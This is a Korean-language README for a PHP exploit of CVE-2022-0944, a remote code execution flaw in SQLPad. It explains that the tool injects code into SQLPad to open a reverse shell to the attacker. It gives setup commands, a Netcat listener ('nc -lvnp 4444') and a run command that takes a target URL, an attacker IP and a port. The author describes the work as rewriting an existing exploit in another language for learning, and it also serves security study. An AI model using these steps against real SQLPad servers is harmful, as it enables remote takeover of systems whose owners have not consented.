
CVE-2022-0944 원격 코드 실행 악용
이 PHP 코드는 SQLPad의 원격 코드 실행(RCE) 취약점(CVE-2022-0944)을 악용하도록 설계되었습니다.
악성 코드를 SQLPad 애플리케이션에 주입하여 시스템 명령을 실행하도록 강제함으로써 공격자가 취약한 시스템을 원격으로 제어할 수 있는 리버스 셸 연결을 만듭니다.
sudo apt-get install php-clisudo apt-get install php-curl리버스 셸 연결을 캡처하려면 공격자 머신에서 Netcat을 시작하십시오:
nc -lvnp 4444
php exploit.php <root_url> <attacker_ip> <attacker_port>
<root_url>: 취약한 SQLPad의 루트 URL (예: http://target.com:3000)
<attacker_ip>: 리버스 연결을 수신하는 공격자의 IP 주소 (Netcat IP와 동일)
<attacker_port>: 공격자가 수신 중인 포트 (Netcat 포트와 동일)
원본 익스플로잇 로직은 다음 저장소를 기반으로 합니다:
여기서의 목표는 익스플로잇 로직을 이해하고 개인적인 도전으로 다른 프로그래밍 언어로 다시 작성하는 것이었습니다.
추가 참고 자료: 🔗 CVE-2022-0944 – NVD